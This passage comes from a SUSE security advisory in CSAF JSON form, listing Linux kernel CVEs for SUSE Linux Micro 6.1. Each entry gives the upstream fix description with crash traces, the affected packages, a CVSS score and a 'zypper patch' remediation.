"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68367"
},
{
"cve": "CVE-2025-68372",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68372"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config put in recv_work\n\nThere is one uaf issue in recv_work when running NBD_CLEAR_SOCK and\nNBD_CMD_RECONFIGURE:\n nbd_genl_connect // conf_ref=2 (connect and recv_work A)\n nbd_open\t // conf_ref=3\n recv_work A done // conf_ref=2\n NBD_CLEAR_SOCK // conf_ref=1\n nbd_genl_reconfigure // conf_ref=2 (trigger recv_work B)\n close nbd\t // conf_ref=1\n recv_work B\n config_put // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nOr only running NBD_CLEAR_SOCK:\n nbd_genl_connect // conf_ref=2\n nbd_open \t // conf_ref=3\n NBD_CLEAR_SOCK // conf_ref=2\n close nbd\n nbd_release\n config_put // conf_ref=1\n recv_work\n config_put \t // conf_ref=0\n atomic_dec(\u0026config-\u003erecv_threads); -\u003e UAF\n\nCommit 87aac3a80af5 (\"nbd: call nbd_config_put() before notifying the\nwaiter\") moved nbd_config_put() to run before waking up the waiter in\nrecv_work, in order to ensure that nbd_start_device_ioctl() would not\nbe woken up while nbd-\u003etask_recv was still uncleared.\n\nHowever, in nbd_start_device_ioctl(), after being woken up it explicitly\ncalls flush_workqueue() to make sure all current works are finished.\nTherefore, there is no need to move the config put ahead of the wakeup.\n\nMove nbd_config_put() to the end of recv_work, so that the reference is\nheld for the whole lifetime of the worker thread. This makes sure the\nconfig cannot be freed while recv_work is still running, even if clear\n+ reconfigure interleave.\n\nIn addition, we don\u0027t need to worry about recv_work dropping the last\nnbd_put (which causes deadlock):\n\npath A (netlink with NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=1 (trigger recv_work)\n open nbd // nbd_refs=2\n NBD_CLEAR_SOCK\n close nbd\n nbd_release\n nbd_disconnect_and_put\n flush_workqueue // recv_work done\n nbd_config_put\n nbd_put // nbd_refs=1\n nbd_put // nbd_refs=0\n queue_work\n\npath B (netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68378",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68378"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Fix stackmap overflow check in __bpf_get_stackid()\n\nSyzkaller reported a KASAN slab-out-of-bounds write in __bpf_get_stackid()\nwhen copying stack trace data. The issue occurs when the perf trace\n contains more stack entries than the stack map bucket can hold,\n leading to an out-of-bounds write in the bucket\u0027s data array.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68378",
"url": "https://www.suse.com/security/cve/CVE-2025-68378"
},
{
"category": "external",
"summary": "SUSE Bug 1255614 for CVE-2025-68378",
"url": "https://bugzilla.suse.com/1255614"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68378"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
